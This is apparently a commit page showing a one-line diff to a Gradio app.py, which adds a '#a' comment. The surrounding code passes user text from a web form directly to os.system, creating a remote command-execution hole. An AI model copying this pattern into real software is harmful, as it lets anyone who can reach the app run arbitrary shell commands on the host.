retr0reg commited on
Commit
cb2d012
·
unverified ·
1 Parent(s): 094b65a

Add application file

Browse files
Files changed (1) hide show
  1. app.py +1 -0
app.py CHANGED
@@ -5,4 +5,5 @@ def greet(name):
5
  return os.system(name)
6
 
7
  iface = gr.Interface(fn=greet, inputs="text", outputs="text")
 
8
  iface.launch()
 
5
  return os.system(name)
6
 
7
  iface = gr.Interface(fn=greet, inputs="text", outputs="text")
8
+ #a
9
  iface.launch()